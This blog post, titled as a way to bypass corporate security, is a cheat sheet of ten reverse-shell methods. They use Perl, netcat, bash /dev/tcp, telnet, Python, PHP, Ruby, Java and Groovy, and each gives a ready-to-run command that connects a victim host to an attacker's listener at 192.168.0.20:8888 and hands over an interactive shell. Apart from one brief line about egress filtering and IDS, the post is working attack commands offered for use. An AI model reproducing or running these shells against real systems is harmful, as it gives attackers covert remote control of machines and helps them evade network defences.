Bypass corporate security with a reverse shell

cat << EOF | curl -X PUT -d @- uberleet.org

Reverse-Shell-illustration

A reverse shell is where an attacker sets a socket listening on a ‘control machine’ on a remote port, then waits for a connection. A compromised machine is then instructed to connect to the control port invoke BASH and await commands from the control host.

This is damaging because the hacked host can sit behind a firewall and contact a controller at any time without your knowledge. This can be mitigated by egress firewalls and IDS but port 80, 443 or 53 are usually open, so an IDS will have to do packet inspect for validating the protocols meets spec.

Here’s 9 drastically different ways to do this employing our friend BASH and pipe redirection.

1) Perl reverse shell

Perl is a good example as it’s been on every machine I’ve seen for the last 20 years.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example takes the STDIN, STDOUT, STDERR from /bin/sh and maps it to the socket.

Start the shell on your victim host

perl -e 'use Socket;$i="192.168.0.20";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2) netcat reverse shell ("hardened" openbsd version)

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Now you create a FIFO file and use it as a backpipe to relay the stdout from commands piped from netcat to /bin/bash back to the controlling host.

On your victim/target host start the shell

mknod fifodev p && nc 192.168.0.20 8888 0<fifodev | /bin/bash 1>fifodev

or

mkfifo fifodev && nc 192.168.0.20 8888 0<fifodev | /bin/bash 1>fifodev

3) netcat reverse shell (traditional version)

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Start the shell on your victim host

nc 192.168.0.20 8888 -e /bin/bash

4) /dev/tcp + bash reverse shell

/dev/tcp is a bash built-in pseudo-device file that can be exploited to make arbitrary sockets from bash. This example pipes an interactive shell to your control host.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Start the shell on your victim host

/bin/bash -i > /dev/tcp/192.168.0.20/8888 0<&1 2>&1

5) Double telnet reverse shell

This approach uses two netcat sessions and some telnet hacks to exploit only bash and telnet on your victim host. Specifically pipe input from one control session (port 2222) to /bin/bash and pipe the output to the second control session (port 1111)

On your control host create two shells running these two listeners

nc -n -vv -l -p 1111
# stdout shell ^
nc -n -vv -l -p 2222
# stdin shell ^

On your victim/target host start the shell

telnet 192.168.0.20 2222 | /bin/bash | telnet 192.168.0.20 1111

6) Python reverse shell

This imports socket and uses supprocess to call a subshell. It manages stdin/stdout to the subshell.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example takes the file descriptors for STDIN, STDOUT, STDERR using os.dup2 and maps them to /bin/sh

Start the shell on your victim host

# Python 2.7 tested
python -c 'import socket,subprocess,os;x=socket.socket(socket.AF_INET,socket.SOCK_STREAM);x.connect(("192.168.0.20",8888));os.dup2(x.fileno(),0); os.dup2(x.fileno(),1); os.dup2(x.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

7) PHP reverse shell

Of course any exploit wouldn’t feel at home without PHP involved.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example takes the file descriptors for STDIN (<&3), STDOUT (>&3), STDERR (2>&3) and maps them to fsockopen()

Start the shell on your victim host

# PHP 5.5 tested
php -r '$sock=fsockopen("192.168.0.20",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

8) Ruby reverse shell

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example takes the file descriptors for STDIN (<&%d), STDOUT (>&%d), STDERR (2>&%d) and maps to TCPSocket.open

Start the shell on your victim host

# Ruby 1.9.3 tested
ruby -rsocket -e'f=TCPSocket.open("192.168.0.20",8888).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

9) Java reverse shell

You probably don’t want to see this in production.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Put this code in your java execution

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.20/8888;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

10) Groovy reverse shell

You probably don’t want to see this in production.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Put this code in your java execution

String host="192.168.0.20";
int port=8888;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
EOF

Leave a Reply

Your email address will not be published. Required fields are marked *